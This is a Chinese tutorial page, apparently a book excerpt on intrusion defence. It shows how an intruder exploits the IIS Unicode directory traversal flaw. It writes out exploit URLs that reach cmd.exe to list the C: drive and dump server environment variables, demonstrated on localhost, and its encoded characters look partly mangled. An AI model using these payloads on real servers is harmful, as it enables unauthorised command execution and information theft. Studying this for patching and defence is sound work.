当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(14)
![]()
(1) 入侵者在手工或是使用扫描工具找到有UNICODE漏洞的服务器后,在浏览器中输入:
http://目标机/scripts/..Á../winnt/system32/cmd.exe?/c+dir+c:\
或
http://目标机/scripts/..À/../winnt/system32/cmd.exe?/c+dir+c:\
等(其他编码检测请参阅本书3.7.1 节中UNICODE漏洞的修补)
通过以上输入向服务器发出请求,得到结果如图6-80所示。

图6-80 UNICODE漏洞
这里以本机(IP:127.0.0.1)存在的UNICODE漏洞进行检测,从图6-80中可以看到被检测服务器的C盘目录被列了出来,这就是所谓的UNICODE漏洞,也叫目录遍历漏洞。
(2) 接下来入侵者将会去查找服务器所存放主页的位置,接着在浏览器中向存有UNICODE漏洞的服务器发送一条请求,请求内容如下:
http://127.0.0.1/scripts/..Á../winnt/system32/cmd.exe?/c+set
或是
http://127.0.0.1/scripts/..À/../winnt/system32/cmd.exe?/c+set等
得到的结果如图6-81所示。

图6-81 查看服务器信息
<
评论 (0) All